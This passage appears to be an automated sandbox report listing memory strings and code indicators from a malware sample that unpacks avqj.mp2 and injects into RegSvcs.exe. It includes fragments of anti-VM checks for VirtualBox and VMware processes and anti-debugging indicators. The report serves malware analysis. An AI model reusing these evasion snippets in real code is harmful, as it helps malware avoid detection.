                Source: avqj.mp2, 00000008.00000003.2325438490.0000000001193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe7:
                Source: avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3128902063.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3112151550.00000000019FF000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258521967.00000000019BF000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258032251.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257469824.00000000019A8000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257692602.00000000019AB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258604460.00000000019C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
                Source: avqj.mp2.exe, 00000013.00000003.2570326128.00000000019A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenIM2
                Source: avqj.mp2.exe, 00000014.00000003.3257351157.000000000196E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") ThenIM2
                Source: avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenC
                Source: avqj.mp2.exe, 00000013.00000003.3043097466.00000000019F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
                Source: avqj.mp2.exe, 0000000F.00000003.2585544729.0000000001113000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3129291939.0000000001993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: awggmrd.xls.0.dr, awggmrd.xls.8.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: C:\Users\user\Desktop\u549ed5dEA.exeAPI call chain: ExitProcess graph end nodegraph_0-28561
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Process information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0146096E rdtsc 14_2_0146096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00417D83 LdrLoadDll,14_2_00417D83
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFF3FF BlockInput,8_2_00EFF3FF
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CB6878
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00E85D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00E85D78
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CBECAA mov eax, dword ptr fs:[00000030h]0_2_00CBECAA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EA5078 mov eax, dword ptr fs:[00000030h]8_2_00EA5078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]14_2_014B4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]14_2_014B4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B4144 mov ecx, dword ptr fs:[00000030h]14_2_014B4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]14_2_014B4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B4144 mov eax, dword ptr fs:[00000030h]14_2_014B4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B8158 mov eax, dword ptr fs:[00000030h]14_2_014B8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426154 mov eax, dword ptr fs:[00000030h]14_2_01426154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426154 mov eax, dword ptr fs:[00000030h]14_2_01426154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141C156 mov eax, dword ptr fs:[00000030h]14_2_0141C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4164 mov eax, dword ptr fs:[00000030h]14_2_014F4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F4164 mov eax, dword ptr fs:[00000030h]14_2_014F4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov eax, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE10E mov ecx, dword ptr fs:[00000030h]14_2_014CE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CA118 mov ecx, dword ptr fs:[00000030h]14_2_014CA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CA118 mov eax, dword ptr fs:[00000030h]14_2_014CA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CA118 mov eax, dword ptr fs:[00000030h]14_2_014CA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CA118 mov eax, dword ptr fs:[00000030h]14_2_014CA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E0115 mov eax, dword ptr fs:[00000030h]14_2_014E0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01450124 mov eax, dword ptr fs:[00000030h]14_2_01450124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E61C3 mov eax, dword ptr fs:[00000030h]14_2_014E61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E61C3 mov eax, dword ptr fs:[00000030h]14_2_014E61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]14_2_0149E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]14_2_0149E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E1D0 mov ecx, dword ptr fs:[00000030h]14_2_0149E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]14_2_0149E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0149E1D0 mov eax, dword ptr fs:[00000030h]14_2_0149E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F61E5 mov eax, dword ptr fs:[00000030h]14_2_014F61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014501F8 mov eax, dword ptr fs:[00000030h]14_2_014501F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01460185 mov eax, dword ptr fs:[00000030h]14_2_01460185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DC188 mov eax, dword ptr fs:[00000030h]14_2_014DC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DC188 mov eax, dword ptr fs:[00000030h]14_2_014DC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C4180 mov eax, dword ptr fs:[00000030h]14_2_014C4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C4180 mov eax, dword ptr fs:[00000030h]14_2_014C4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]14_2_014A019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]14_2_014A019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]14_2_014A019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A019F mov eax, dword ptr fs:[00000030h]14_2_014A019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A197 mov eax, dword ptr fs:[00000030h]14_2_0141A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A197 mov eax, dword ptr fs:[00000030h]14_2_0141A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A197 mov eax, dword ptr fs:[00000030h]14_2_0141A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01422050 mov eax, dword ptr fs:[00000030h]14_2_01422050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A6050 mov eax, dword ptr fs:[00000030h]14_2_014A6050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144C073 mov eax, dword ptr fs:[00000030h]14_2_0144C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A4000 mov ecx, dword ptr fs:[00000030h]14_2_014A4000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C2000 mov eax, dword ptr fs:[00000030h]14_2_014C2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]14_2_0143E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]14_2_0143E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]14_2_0143E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E016 mov eax, dword ptr fs:[00000030h]14_2_0143E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A020 mov eax, dword ptr fs:[00000030h]14_2_0141A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141C020 mov eax, dword ptr fs:[00000030h]14_2_0141C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B6030 mov eax, dword ptr fs:[00000030h]14_2_014B6030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A20DE mov eax, dword ptr fs:[00000030h]14_2_014A20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A0E3 mov ecx, dword ptr fs:[00000030h]14_2_0141A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A60E0 mov eax, dword ptr fs:[00000030h]14_2_014A60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014280E9 mov eax, dword ptr fs:[00000030h]14_2_014280E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141C0F0 mov eax, dword ptr fs:[00000030h]14_2_0141C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014620F0 mov ecx, dword ptr fs:[00000030h]14_2_014620F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142208A mov eax, dword ptr fs:[00000030h]14_2_0142208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014180A0 mov eax, dword ptr fs:[00000030h]14_2_014180A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B80A8 mov eax, dword ptr fs:[00000030h]14_2_014B80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E60B8 mov eax, dword ptr fs:[00000030h]14_2_014E60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014E60B8 mov ecx, dword ptr fs:[00000030h]14_2_014E60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F634F mov eax, dword ptr fs:[00000030h]14_2_014F634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A2349 mov eax, dword ptr fs:[00000030h]14_2_014A2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov ecx, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A035C mov eax, dword ptr fs:[00000030h]14_2_014A035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014EA352 mov eax, dword ptr fs:[00000030h]14_2_014EA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C8350 mov ecx, dword ptr fs:[00000030h]14_2_014C8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C437C mov eax, dword ptr fs:[00000030h]14_2_014C437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A30B mov eax, dword ptr fs:[00000030h]14_2_0145A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A30B mov eax, dword ptr fs:[00000030h]14_2_0145A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0145A30B mov eax, dword ptr fs:[00000030h]14_2_0145A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141C310 mov ecx, dword ptr fs:[00000030h]14_2_0141C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01440310 mov ecx, dword ptr fs:[00000030h]14_2_01440310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov eax, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov ecx, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov eax, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F8324 mov eax, dword ptr fs:[00000030h]14_2_014F8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DC3CD mov eax, dword ptr fs:[00000030h]14_2_014DC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0142A3C0 mov eax, dword ptr fs:[00000030h]14_2_0142A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014283C0 mov eax, dword ptr fs:[00000030h]14_2_014283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A63C0 mov eax, dword ptr fs:[00000030h]14_2_014A63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov eax, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov eax, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov ecx, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014CE3DB mov eax, dword ptr fs:[00000030h]14_2_014CE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C43D4 mov eax, dword ptr fs:[00000030h]14_2_014C43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014C43D4 mov eax, dword ptr fs:[00000030h]14_2_014C43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014303E9 mov eax, dword ptr fs:[00000030h]14_2_014303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E3F0 mov eax, dword ptr fs:[00000030h]14_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E3F0 mov eax, dword ptr fs:[00000030h]14_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0143E3F0 mov eax, dword ptr fs:[00000030h]14_2_0143E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014563FF mov eax, dword ptr fs:[00000030h]14_2_014563FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E388 mov eax, dword ptr fs:[00000030h]14_2_0141E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E388 mov eax, dword ptr fs:[00000030h]14_2_0141E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141E388 mov eax, dword ptr fs:[00000030h]14_2_0141E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144438F mov eax, dword ptr fs:[00000030h]14_2_0144438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0144438F mov eax, dword ptr fs:[00000030h]14_2_0144438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418397 mov eax, dword ptr fs:[00000030h]14_2_01418397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418397 mov eax, dword ptr fs:[00000030h]14_2_01418397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01418397 mov eax, dword ptr fs:[00000030h]14_2_01418397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A8243 mov eax, dword ptr fs:[00000030h]14_2_014A8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014A8243 mov ecx, dword ptr fs:[00000030h]14_2_014A8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0141A250 mov eax, dword ptr fs:[00000030h]14_2_0141A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014F625D mov eax, dword ptr fs:[00000030h]14_2_014F625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01426259 mov eax, dword ptr fs:[00000030h]14_2_01426259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014DA250 mov eax, dword ptr fs:[00000030h]14_2_014DA250
